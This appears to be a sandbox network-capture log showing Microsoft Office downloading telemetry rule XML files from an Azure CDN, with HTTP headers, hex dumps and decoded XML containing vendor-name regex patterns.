                                                                                                                                            2024-10-31 16:13:08 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            58192.168.2.44981413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:08 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:08 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 491
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                            ETag: "0x8DC582B98B88612"
                                                                                                                                            x-ms-request-id: 39d89106-201e-003f-20a3-266d94000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161308Z-16849878b78qg9mlz11wgn0wcc00000009e00000000024us
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:08 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            59192.168.2.44981313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:08 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:08 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:08 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 475
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                                            ETag: "0x8DC582BB2BE84FD"
                                                                                                                                            x-ms-request-id: 99f07890-301e-0051-29d2-2538bb000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161308Z-16849878b78x6gn56mgecg60qc0000000bm000000000chg8
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:08 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            60192.168.2.44982013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:09 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:09 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 419
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                            ETag: "0x8DC582B9C710B28"
                                                                                                                                            x-ms-request-id: e05d2f30-201e-006e-17a7-2abbe3000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161309Z-159b85dff8fvjwrdhC1DFWsn1000000001f0000000008t7x
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:09 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            61192.168.2.44982113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:09 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:09 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 477
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                            ETag: "0x8DC582BA54DCC28"
                                                                                                                                            x-ms-request-id: 9921b831-601e-0097-069c-27f33a000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161309Z-16849878b78fkwcjkpn19c5dsn00000008vg000000003k66
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:09 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            62192.168.2.44981913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:09 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:09 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 471
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                            ETag: "0x8DC582B97E6FCDD"
                                                                                                                                            x-ms-request-id: 0697abc8-001e-00ad-714f-28554b000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161309Z-15b8d89586fst84kttks1s2css00000003hg000000001vh4
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:09 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            63192.168.2.44981813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:09 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:09 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:09 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 415
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                            ETag: "0x8DC582BA80D96A1"
                                                                                                                                            x-ms-request-id: 2909f93e-001e-0066-4539-2b561e000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161309Z-15b8d89586ffsjj9qb0gmb1stn0000000e2g000000001ybq
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:09 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            64192.168.2.44982213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:10 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:10 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:10 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 419
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                            ETag: "0x8DC582BB7F164C3"
                                                                                                                                            x-ms-request-id: 3efaf52f-501e-008c-0d35-29cd39000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161310Z-15b8d89586f4zwgbgswvrvz4vs0000000b8000000000617f
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            65192.168.2.44982313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:10 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:10 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 477
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                            x-ms-request-id: a1cd7d15-b01e-0070-762b-271cc0000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161310Z-16849878b78tg5n42kspfr0x4800000009t000000000ck9y
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:10 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            66192.168.2.44982413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:10 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:10 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 419
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                            ETag: "0x8DC582B9FF95F80"
                                                                                                                                            x-ms-request-id: 3c5c3d60-c01e-0066-4c9e-26a1ec000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161310Z-16849878b78tg5n42kspfr0x4800000009pg00000000vz90
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:10 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            67192.168.2.44981713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:10 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:10 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:10 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 479
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                            ETag: "0x8DC582B989EE75B"
                                                                                                                                            x-ms-request-id: 5926a802-601e-0032-207f-2aeebb000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161310Z-16849878b78wc6ln1zsrz6q9w800000009f0000000009m1r
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
